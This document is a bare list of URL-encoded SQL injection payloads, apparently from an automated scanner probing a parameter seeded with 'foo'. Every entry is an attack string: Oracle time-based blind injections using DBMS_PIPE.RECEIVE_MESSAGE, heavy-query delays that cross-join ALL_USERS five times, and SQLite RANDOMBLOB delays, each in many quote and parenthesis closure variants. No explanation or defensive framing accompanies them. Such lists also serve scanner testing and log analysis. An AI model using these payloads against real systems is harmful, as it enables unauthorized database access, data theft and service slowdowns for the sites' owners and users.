foo%27%2B%28SELECT%20%27MQzP%27%20WHERE%203269%3D3269%20AND%206504%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28112%29%7C%7CCHR%28107%29%7C%7CCHR%28113%29%7C%7CCHR%2878%29%2C5%29-- foo%27%20IN%20BOOLEAN%20MODE%29%20AND%206504%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28112%29%7C%7CCHR%28107%29%7C%7CCHR%28113%29%7C%7CCHR%2878%29%2C5%29-- foo%29%20AND%201993%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29 foo%27%29%20AND%201993%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29 foo%27%20AND%201993%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29 foo%22%20AND%201993%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29 foo%29%20AND%201993%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%284264%3D4264 foo%29%29%20AND%201993%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%28%283287%3D3287 foo%29%29%29%20AND%201993%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%28%28%281495%3D1495 foo%20AND%201993%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29 foo%27%29%20AND%201993%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%28%27KKaH%27%3D%27KKaH foo%27%29%29%20AND%201993%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%28%28%27Hgya%27%3D%27Hgya foo%27%29%29%29%20AND%201993%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%28%28%28%27DvrL%27%3D%27DvrL foo%27%20AND%201993%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%27VyaM%27%3D%27VyaM foo%27%29%20AND%201993%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%28%27apDo%27%20LIKE%20%27apDo foo%27%29%29%20AND%201993%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%28%28%27WfCF%27%20LIKE%20%27WfCF foo%27%29%29%29%20AND%201993%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%28%28%28%27vKAv%27%20LIKE%20%27vKAv foo%27%20AND%201993%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%27BZXC%27%20LIKE%20%27BZXC foo%22%29%20AND%201993%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%28%22kcqO%22%3D%22kcqO foo%22%29%29%20AND%201993%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%28%28%22xsRJ%22%3D%22xsRJ foo%22%29%29%29%20AND%201993%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%28%28%28%22xxel%22%3D%22xxel foo%22%20AND%201993%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%22ikjd%22%3D%22ikjd foo%22%29%20AND%201993%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%28%22FMbY%22%20LIKE%20%22FMbY foo%22%29%29%20AND%201993%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%28%28%22MhuY%22%20LIKE%20%22MhuY foo%22%29%29%29%20AND%201993%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%28%28%28%22kbvJ%22%20LIKE%20%22kbvJ foo%22%20AND%201993%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%22HXuf%22%20LIKE%20%22HXuf foo%25%27%29%20AND%201993%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%28%27%25%27%3D%27 foo%25%27%29%29%20AND%201993%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%28%28%27%25%27%3D%27 foo%25%27%29%29%29%20AND%201993%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%28%28%28%27%25%27%3D%27 foo%25%27%20AND%201993%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%27%25%27%3D%27 foo%00%27%29%20AND%201993%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%28%27QbBg%27%3D%27QbBg foo%00%27%20AND%201993%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%27ElTy%27%3D%27ElTy foo%27%29%20WHERE%203170%3D3170%20AND%201993%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20--%20 foo%22%29%20WHERE%206368%3D6368%20AND%201993%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20--%20 foo%29%20WHERE%206255%3D6255%20AND%201993%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20--%20 foo%27%20WHERE%208299%3D8299%20AND%201993%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20--%20 foo%22%20WHERE%208793%3D8793%20AND%201993%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20--%20 foo%20WHERE%201614%3D1614%20AND%201993%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20--%20 foo%27%7C%7C%28SELECT%20%27URPd%27%20FROM%20DUAL%20WHERE%204567%3D4567%20AND%201993%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20%29%7C%7C%27 foo%27%7C%7C%28SELECT%20%27WhtR%27%20WHERE%206334%3D6334%20AND%201993%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20%29%7C%7C%27 foo%27%2B%28SELECT%20DrDQ%20WHERE%209343%3D9343%20AND%201993%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20%29%2B%27 foo%27%2B%28SELECT%20%27zdyB%27%20WHERE%203656%3D3656%20AND%201993%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20%29%2B%27 foo%27%20IN%20BOOLEAN%20MODE%29%20AND%201993%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20%23 foo%29%20AND%209739%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29-- foo%27%29%20AND%209739%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29-- foo%27%20AND%209739%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29-- foo%22%20AND%209739%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29-- foo%29%20AND%209739%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29-- foo%29%29%20AND%209739%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29-- foo%29%29%29%20AND%209739%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29-- foo%20AND%209739%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29-- foo%27%29%20AND%209739%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29-- foo%27%29%29%20AND%209739%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29-- foo%27%29%29%29%20AND%209739%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29-- foo%27%20AND%209739%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29-- foo%27%29%20AND%209739%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29-- foo%27%29%29%20AND%209739%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29-- foo%27%29%29%29%20AND%209739%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29-- foo%27%20AND%209739%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29-- foo%22%29%20AND%209739%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29-- foo%22%29%29%20AND%209739%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29-- foo%22%29%29%29%20AND%209739%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29-- foo%22%20AND%209739%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29-- foo%22%29%20AND%209739%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29-- foo%22%29%29%20AND%209739%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29-- foo%22%29%29%29%20AND%209739%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29-- foo%22%20AND%209739%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29-- foo%25%27%29%20AND%209739%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29-- foo%25%27%29%29%20AND%209739%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29-- foo%25%27%29%29%29%20AND%209739%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29-- foo%25%27%20AND%209739%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29-- foo%00%27%29%20AND%209739%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29-- foo%00%27%20AND%209739%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29-- foo%27%29%20WHERE%209269%3D9269%20AND%209739%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29-- foo%22%29%20WHERE%209604%3D9604%20AND%209739%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29-- foo%29%20WHERE%203371%3D3371%20AND%209739%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29-- foo%27%20WHERE%201207%3D1207%20AND%209739%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29-- foo%22%20WHERE%204999%3D4999%20AND%209739%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29-- foo%20WHERE%204065%3D4065%20AND%209739%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29-- foo%27%7C%7C%28SELECT%20%27hsbr%27%20FROM%20DUAL%20WHERE%205738%3D5738%20AND%209739%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29-- foo%27%7C%7C%28SELECT%20%27DTlo%27%20WHERE%204630%3D4630%20AND%209739%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29-- foo%27%2B%28SELECT%20qjut%20WHERE%208978%3D8978%20AND%209739%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29-- foo%27%2B%28SELECT%20%27qtzq%27%20WHERE%206728%3D6728%20AND%209739%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29-- foo%27%20IN%20BOOLEAN%20MODE%29%20AND%209739%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29-- foo%29%20AND%201269%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29 foo%27%29%20AND%201269%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29 foo%27%20AND%201269%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29 foo%22%20AND%201269%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29 foo%29%20AND%201269%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%20AND%20%287434%3D7434 foo%29%29%20AND%201269%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%20AND%20%28%284103%3D4103 foo%29%29%29%20AND%201269%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%20AND%20%28%28%287299%3D7299 foo%20AND%201269%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29 foo%27%29%20AND%201269%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%20AND%20%28%27aDbK%27%3D%27aDbK foo%27%29%29%20AND%201269%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%20AND%20%28%28%27AAhw%27%3D%27AAhw foo%27%29%29%29%20AND%201269%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%20AND%20%28%28%28%27RVEa%27%3D%27RVEa foo%27%20AND%201269%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%20AND%20%27PiBQ%27%3D%27PiBQ foo%27%29%20AND%201269%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%20AND%20%28%27OHyd%27%20LIKE%20%27OHyd foo%27%29%29%20AND%201269%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%20AND%20%28%28%27xpXY%27%20LIKE%20%27xpXY foo%27%29%29%29%20AND%201269%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%20AND%20%28%28%28%27yyxl%27%20LIKE%20%27yyxl foo%27%20AND%201269%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%20AND%20%27QwxX%27%20LIKE%20%27QwxX foo%22%29%20AND%201269%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%20AND%20%28%22AfdA%22%3D%22AfdA foo%22%29%29%20AND%201269%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%20AND%20%28%28%22GHZF%22%3D%22GHZF foo%22%29%29%29%20AND%201269%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%20AND%20%28%28%28%22fkpq%22%3D%22fkpq foo%22%20AND%201269%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%20AND%20%22lVns%22%3D%22lVns foo%22%29%20AND%201269%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%20AND%20%28%22aXJA%22%20LIKE%20%22aXJA foo%22%29%29%20AND%201269%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%20AND%20%28%28%22GLZb%22%20LIKE%20%22GLZb foo%22%29%29%29%20AND%201269%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%20AND%20%28%28%28%22hurt%22%20LIKE%20%22hurt foo%22%20AND%201269%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%20AND%20%22aRRX%22%20LIKE%20%22aRRX foo%25%27%29%20AND%201269%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%20AND%20%28%27%25%27%3D%27 foo%25%27%29%29%20AND%201269%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%20AND%20%28%28%27%25%27%3D%27 foo%25%27%29%29%29%20AND%201269%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%20AND%20%28%28%28%27%25%27%3D%27 foo%25%27%20AND%201269%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%20AND%20%27%25%27%3D%27 foo%00%27%29%20AND%201269%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%20AND%20%28%27boyt%27%3D%27boyt foo%00%27%20AND%201269%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%20AND%20%27cvDl%27%3D%27cvDl foo%27%29%20WHERE%206589%3D6589%20AND%201269%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%20--%20 foo%22%29%20WHERE%207555%3D7555%20AND%201269%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%20--%20 foo%29%20WHERE%202390%3D2390%20AND%201269%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%20--%20 foo%27%20WHERE%205211%3D5211%20AND%201269%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%20--%20 foo%22%20WHERE%206828%3D6828%20AND%201269%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%20--%20 foo%20WHERE%207567%3D7567%20AND%201269%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%20--%20 foo%27%7C%7C%28SELECT%20%27HpGV%27%20FROM%20DUAL%20WHERE%201988%3D1988%20AND%201269%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%20%29%7C%7C%27 foo%27%7C%7C%28SELECT%20%27shoE%27%20WHERE%203994%3D3994%20AND%201269%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%20%29%7C%7C%27 foo%27%2B%28SELECT%20Tsoe%20WHERE%206819%3D6819%20AND%201269%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%20%29%2B%27 foo%27%2B%28SELECT%20%27XVjv%27%20WHERE%202961%3D2961%20AND%201269%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%20%29%2B%27 foo%27%20IN%20BOOLEAN%20MODE%29%20AND%201269%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29%20%23 foo%29%20AND%201413%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- foo%27%29%20AND%201413%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- foo%27%20AND%201413%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- foo%22%20AND%201413%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- foo%29%20AND%201413%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- foo%29%29%20AND%201413%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- foo%29%29%29%20AND%201413%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- foo%20AND%201413%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- foo%27%29%20AND%201413%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000%2F2%29%29%29%29-- 